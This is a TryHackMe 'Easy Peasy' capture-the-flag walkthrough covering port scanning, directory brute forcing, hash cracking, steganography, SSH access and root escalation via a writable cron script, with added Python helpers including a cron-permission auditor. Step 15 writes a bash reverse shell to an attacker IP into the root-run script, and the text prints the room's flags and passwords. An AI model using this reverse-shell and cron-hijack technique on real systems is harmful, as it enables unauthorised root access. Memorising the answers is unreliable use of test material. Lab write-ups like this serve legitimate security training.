TryHackMe: Easy Peasy
Introduction
Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.
Procedure
1. Full Port Scanning
We start by identifying every open TCP port on the target. -p- covers all 65535 ports, --open keeps only the open ones, and --min-rate 5000 trades accuracy for speed, so rerun without it if a port seems to be missing:
nmap -p- --open -T4 --min-rate 5000 IP
Output:
PORT STATE SERVICE
80/tcp open http
6498/tcp open unknown
65524/tcp open unknown
2. Detailed Service Fingerprinting
We run version detection (-sV) and the default NSE script set (-sC) against the three discovered ports:
nmap -p 80,6498,65524 -sC -sV IP
Output:
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.16.1
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.16.1
6498/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 30:4a:2b:22:ac:d9:56:09:f2:da:12:20:57:f4:6c:d4 (RSA)
| 256 bf:86:c9:c7:b7:ef:8c:8b:b9:94:ae:01:88:c0:85:4d (ECDSA)
|_ 256 a1:72:ef:6c:81:29:13:ef:5a:6c:24:03:4c:fe:3d:0b (ED25519)
65524/tcp open http Apache httpd 2.4.43 ((Ubuntu))
|_http-server-header: Apache/2.4.43 (Ubuntu)
|_http-title: Apache2 Debian Default Page: It works
| http-robots.txt: 1 disallowed entry
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
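The two scans above can be chained instead of retyping the port list by hand. The script below is an added example, not part of the original writeup: it parses the greppable output of the full-port sweep (nmap's real -oG - option writes it to stdout) and builds the targeted -sC -sV command from whatever was found. The sample output embedded in it is constructed to match the ports on this box, and the address 10.10.10.10 is a placeholder.

```python
"""Chain the full-port sweep into the service scan by parsing nmap's
greppable (-oG) output instead of copying port numbers by hand."""
from __future__ import annotations

import re
import shlex

# Constructed sample of what `nmap -p- --open -T4 --min-rate 5000 -oG - 10.10.10.10`
# prints for this box (the address is a placeholder).
SAMPLE_GNMAP = """\
# Nmap 7.93 scan initiated as: nmap -p- --open -T4 --min-rate 5000 -oG - 10.10.10.10
Host: 10.10.10.10 ()\tStatus: Up
Host: 10.10.10.10 ()\tPorts: 80/open/tcp//http///, 6498/open/tcp//ssh///, 65524/open/tcp//http///\tIgnored State: closed (65532)
# Nmap done -- 1 IP address (1 host up) scanned
"""

# One entry of the "Ports:" field looks like port/state/protocol/owner/service/rpc/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(tcp|udp)/")


def open_ports(gnmap: str, proto: str = "tcp") -> list[int]:
    """Return the sorted list of ports nmap reported as open for `proto`."""
    found = set()
    for line in gnmap.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ports_field = line.split("Ports:", 1)[1]
        for port, state, protocol in PORT_RE.findall(ports_field):
            if state == "open" and protocol == proto:
                found.add(int(port))
    return sorted(found)


def service_scan_command(target: str, ports: list[int]) -> list[str]:
    """Build the argv for the second stage: default scripts plus version
    detection on exactly the ports the sweep found."""
    if not ports:
        raise ValueError("no open ports to fingerprint")
    return ["nmap", "-p", ",".join(str(p) for p in ports), "-sC", "-sV", target]


if __name__ == "__main__":
    # Offline run on the constructed sample; in practice feed sys.stdin from `nmap ... -oG -`.
    ports = open_ports(SAMPLE_GNMAP)
    print("open TCP ports:", ports)
    print(shlex.join(service_scan_command("10.10.10.10", ports)))
```

Reading from a saved file is the same call with the file contents in place of SAMPLE_GNMAP; the parser ignores the comment and Status lines, so the whole -oG output can be passed unchanged.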
3. Web Directory Brute Forcing (Port 80)
We scan the main web server on port 80 for hidden directories using Gobuster:
gobuster dir -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 50
Output:
hidden (Status: 301) [Size: 169] [--> http://IP/hidden/]
4. Exploring /hidden/
Inspecting the source code of http://IP/hidden/ reveals a static placeholder page. We proceed by running directory enumeration inside /hidden/:
gobuster dir -u http://IP/hidden/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 50
Output:
whatever (Status: 301) [Size: 169] [--> http://IP/hidden/whatever/]
5. Exploring /hidden/whatever/
Inspecting the source code of http://IP/hidden/whatever/ reveals a hidden base64 string:
<p hidden>spoiler{ZmxhZ3tmMXJzN19mbDRnfQ==}</p>
6. Decoding the Hidden Parameter (First Flag)
We decode the base64-encoded string found inside the hidden paragraph to retrieve the first flag:
echo "spoiler{ZmxhZ3tmMXJzN19mbDRnfQ==}" | base64 -d
Output:
flag{f1rs7_fl4g}
7. Scanning Port 65524 for Files
Next we enumerate the second web server on port 65524, this time with file extensions so that files, not only directories, are found:
gobuster dir -u http://IP:65524/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 50 -x php,txt,html,xml,bak
Output:
index.html (Status: 200) [Size: 10818]
robots.txt (Status: 200) [Size: 153]
8. Looking Up the robots.txt MD5 Hash (Second Flag)
Reading the contents of http://IP:65524/robots.txt:
User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:spoiler{a18672860d0510e5ab6699730763b250}
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions
We analyze the User-Agent hash to identify the hash type:
hashid spoiler{a18672860d0510e5ab6699730763b250}
Identification output:
Analyzing 'spoiler{a18672860d0510e5ab6699730763b250}'
[+] MD5
[+] MD4
[+] Double MD5
A 32-character hex string is consistent with MD5 (hashid lists several candidates only because they share that length). MD5 is a one-way hash and cannot be decrypted; instead we look the value up in an online database of precomputed hashes (such as MD5 Center), which returns the preimage and with it the second flag:
spoiler{a18672860d0510e5ab6699730763b250} -> flag{1m_s3c0nd_fl4g}
9. Finding Flag 3 inside Apache Source Code
Inspecting the source code of http://IP:65524/index.html reveals the third flag hidden inside a comment:
They are activated by symlinking available
configuration files from their respective
Fl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312}
*-available/ counterparts. These should be managed
by using our helpers
10. Locating the Next Hidden Directory (Base62)
Further down in the source code of http://IP:65524/index.html, we find another hidden comment:
<p hidden>its encoded with ba....:spoiler{ObsJmP173N2X6dOrAgEAL0Vu}</p>
The comment hints at base62. We decode the string with the pybase62 package (pip install pybase62), whose decodebytes function returns the raw bytes:
python3 -c "import base62; print(base62.decodebytes('spoiler{ObsJmP173N2X6dOrAgEAL0Vu}').decode('utf-8'))"
Output:
/n0th1ng3ls3m4tt3r
11. Cracking the GOST Hash
Visiting http://IP:65524/n0th1ng3ls3m4tt3r/ reveals the following hash:
spoiler{940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81}
hashid lists GOST R 34.11-94 among the candidates for this 64-character hex string (SHA-256 has the same length, so trying both formats is reasonable). We save the hash to hash.txt and crack it with John the Ripper using the wordlist supplied by the room:
john --format=gost --wordlist=easypeasy_wordlist.txt hash.txt
Cracked password:
spoiler{mypasswordforthatjob}
12. Extracting Steganographic Data
The directory /n0th1ng3ls3m4tt3r/ also hosts an image named binarycodepixabay.jpg. We download it and extract the embedded data with steghide, entering the cracked passphrase spoiler{mypasswordforthatjob} at the prompt (or passing it with -p):
steghide extract -sf binarycodepixabay.jpg
Output file secrettext.txt contents:
username:boring
password:
spoiler{01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001}
Note: the binary string is the SSH password, one 8-bit group per character.
13. Decoding Binary to Text (SSH Password)
We convert the binary string to text:
for i in spoiler{01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001}; do printf "\x$(printf %x $((2#$i)))"; done; echo
Output:
spoiler{iconvertedmypasswordtobinary}
14. Initial SSH Access (User Flag)
We log in via SSH using the credentials boring / spoiler{iconvertedmypasswordtobinary} on the custom port 6498:
ssh boring@IP -p 6498
Listing the home directory reveals user.txt, whose contents are ROT13-encoded:
spoiler{synt{a0jvgf33zfa0ez4y}}
We decode it to get the user flag:
echo "spoiler{synt{a0jvgf33zfa0ez4y}}" | tr 'a-zA-Z' 'n-za-mN-ZA-M'
Decoded User Flag:
flag{n0wits33msn0rm4l}
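Steps 6, 8, 10, 13 and 14 are all small decoding or verification chores. The script below is an added example, not code from the writeup: it reimplements each of them on the values shown on this page (without the spoiler wrapper), including a base62 decoder that follows the pybase62 conventions (digits 0-9A-Za-z, one big-endian integer, leading 0 digits as leading NUL bytes) so the package is not needed, a check that recomputes MD5 over the lookup result instead of trusting the website, and a binary decoder that rejects a mistyped octet rather than silently yielding a wrong password.

```python
"""Every decode/verify step from the Easy Peasy web enumeration, in one script."""
from __future__ import annotations

import base64
import codecs
import hashlib

BASE62_ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Values taken from this writeup (without the page's spoiler{} wrapper).
FLAG1_B64 = "ZmxhZ3tmMXJzN19mbDRnfQ=="
FLAG2_MD5 = "a18672860d0510e5ab6699730763b250"
FLAG2_LOOKUP = "flag{1m_s3c0nd_fl4g}"          # what the online lookup returned
DIR_B62 = "ObsJmP173N2X6dOrAgEAL0Vu"
PASSWORD_BITS = ("01101001 01100011 01101111 01101110 01110110 01100101 01110010 "
                 "01110100 01100101 01100100 01101101 01111001 01110000 01100001 "
                 "01110011 01110011 01110111 01101111 01110010 01100100 01110100 "
                 "01101111 01100010 01101001 01101110 01100001 01110010 01111001")
USER_ROT13 = "synt{a0jvgf33zfa0ez4y}"


def decode_base64(s: str) -> str:
    """Step 6: standard padded base64, as found in the hidden <p>."""
    return base64.b64decode(s, validate=True).decode("ascii")


def verify_md5_lookup(candidate: str, hexdigest: str) -> bool:
    """Step 8: MD5 is one-way, so a lookup site only returns a *candidate*
    preimage. Recompute the digest locally before trusting it."""
    return hashlib.md5(candidate.encode()).hexdigest() == hexdigest.lower()


def decode_base62(s: str) -> bytes:
    """Step 10: base62 -> bytes with pybase62's conventions: alphabet 0-9A-Za-z,
    the whole string is one big-endian integer, leading '0' digits stand for
    leading NUL bytes."""
    stripped = s.lstrip("0")
    n = 0
    for ch in stripped:
        n = n * 62 + BASE62_ALPHABET.index(ch)   # ValueError on a non-base62 char
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return b"\x00" * (len(s) - len(stripped)) + body


def decode_binary(bits: str) -> str:
    """Step 13: space-separated 8-bit groups -> ASCII. Every group is checked,
    so a mistyped octet such as 01110015 raises instead of producing wrong bytes."""
    octets = bits.split()
    for o in octets:
        if len(o) != 8 or set(o) - {"0", "1"}:
            raise ValueError(f"not an 8-bit binary group: {o!r}")
    return bytes(int(o, 2) for o in octets).decode("ascii")


def rot13(s: str) -> str:
    """Step 14: ROT13 over ASCII letters; braces, digits and underscores pass through."""
    return codecs.decode(s, "rot_13")


if __name__ == "__main__":
    print("flag 1        :", decode_base64(FLAG1_B64))
    print("flag 2 lookup verified:", verify_md5_lookup(FLAG2_LOOKUP, FLAG2_MD5))
    print("hidden dir    :", decode_base62(DIR_B62).decode("ascii"))
    print("ssh password  :", decode_binary(PASSWORD_BITS))
    print("user flag     :", rot13(USER_ROT13))
```

The MD5 check is the one step worth keeping in a toolkit: lookup sites occasionally return collisions from their own tables or truncated entries, and a single hashlib call settles whether the string you are about to submit actually hashes to what robots.txt contained.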
15. Privilege Escalation (Root Flag)
We inspect the system cronjobs:
cat /etc/crontab
Discovered root cronjob:
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
Checking permissions on .mysecretcronjob.sh:
ls -la /var/www/.mysecretcronjob.sh
Output:
-rwxr-xr-x 1 boring boring 33 Jun 14 2020 /var/www/.mysecretcronjob.sh
The cron job runs as root every minute, but the script it executes is owned by boring and therefore writable by us, so anything we put in it runs as root. We overwrite it with a bash reverse-shell one-liner (appending with >> would keep the original contents, which is gentler on a real system):
echo "bash -c 'bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1'" > /var/www/.mysecretcronjob.sh
On our local machine, we start a netcat listener:
nc -lvnp 4444
Within a minute the cron job fires and the listener receives a root shell. We confirm our identity and read the final flag:
whoami
# root
cat /root/.root.txt
Root Flag:
flag{63a9f0ea7bb98050796b649e85481845}
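The weakness that gave us root is a root cron job executing a file an unprivileged user can write. The audit below is an added example, not part of the room or this writeup: it parses system crontab lines (/etc/crontab and /etc/cron.d format), resolves the files each root job runs (following a leading cd, so that the relative .mysecretcronjob.sh above resolves to /var/www/.mysecretcronjob.sh) and flags any that are owned by a non-root user or writable by group or world. The crontab text and the ownership table embedded in it are constructed to mirror this box, and the stat function is injectable so the check runs offline; the path heuristic in referenced_paths is deliberately simple and will miss scripts invoked purely via PATH.

```python
"""Find cron jobs that run as root but execute a file a non-root user can modify."""
from __future__ import annotations

import os
import re
import shlex
import stat
from dataclasses import dataclass
from typing import Callable, Dict, List, NamedTuple, Optional


class FileInfo(NamedTuple):
    st_uid: int
    st_gid: int
    st_mode: int


@dataclass
class CronJob:
    user: str
    command: str


@dataclass
class Finding:
    user: str
    path: str
    reason: str


# Constructed sample mirroring /etc/crontab on this box plus a benign stock entry.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
"""

# Constructed ownership table standing in for os.stat on the target (boring is uid 1000).
SAMPLE_FILES: Dict[str, FileInfo] = {
    "/etc/cron.hourly": FileInfo(0, 0, stat.S_IFDIR | 0o755),
    "/var/www/.mysecretcronjob.sh": FileInfo(1000, 1000, stat.S_IFREG | 0o755),
}


def lookup_in(table: Dict[str, FileInfo]) -> Callable[[str], FileInfo]:
    """Build a stat-like function over a constructed table, for offline use."""
    def _stat(path: str) -> FileInfo:
        if path not in table:
            raise FileNotFoundError(path)
        return table[path]
    return _stat


def parse_system_crontab(text: str) -> List[CronJob]:
    """System crontab format: five time fields, a user, then the command.
    Comments, blank lines, VAR=value lines and @reboot-style entries are skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "@")) or re.match(r"^\w+=", line):
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            jobs.append(CronJob(user=fields[5], command=fields[6]))
    return jobs


def referenced_paths(command: str) -> List[str]:
    """Heuristic: split the command on && || ; |, honour a leading `cd DIR`, and
    treat tokens containing a slash or ending in a script suffix as files the job uses."""
    cwd = "/"
    paths = []
    for segment in re.split(r"&&|\|\||;|\|", command):
        tokens = shlex.split(segment)
        if not tokens:
            continue
        if tokens[0] == "cd" and len(tokens) > 1:
            cwd = os.path.normpath(os.path.join(cwd, tokens[1]))
            continue
        for tok in tokens:
            if tok.startswith("-"):
                continue
            if "/" in tok or tok.endswith((".sh", ".py", ".pl")):
                paths.append(os.path.normpath(os.path.join(cwd, tok)))
    return paths


def writable_by_unprivileged(info: FileInfo) -> Optional[str]:
    """Return why a non-root user could change the file, or None if nobody can."""
    if info.st_uid != 0:
        return f"owned by uid {info.st_uid}, not root"
    if info.st_mode & stat.S_IWOTH:
        return "world-writable"
    if info.st_mode & stat.S_IWGRP and info.st_gid != 0:
        return f"group-writable by gid {info.st_gid}"
    return None


def audit(crontab_text: str, stat_fn: Callable[[str], FileInfo] = os.stat) -> List[Finding]:
    """Report every file a root job runs that a non-root user can modify."""
    findings = []
    for job in parse_system_crontab(crontab_text):
        if job.user != "root":
            continue
        for path in referenced_paths(job.command):
            try:
                info = stat_fn(path)
            except FileNotFoundError:
                continue   # missing target is a different issue (PATH/race), out of scope here
            reason = writable_by_unprivileged(info)
            if reason:
                findings.append(Finding(job.user, path, reason))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CRONTAB, lookup_in(SAMPLE_FILES)):
        print(f"root job runs {f.path}: {f.reason}")
```

On a live host, pass the contents of /etc/crontab (and each file in /etc/cron.d) to audit with the default os.stat; the finding for this box reads "owned by uid 1000, not root", which is exactly the condition the exploit above relies on.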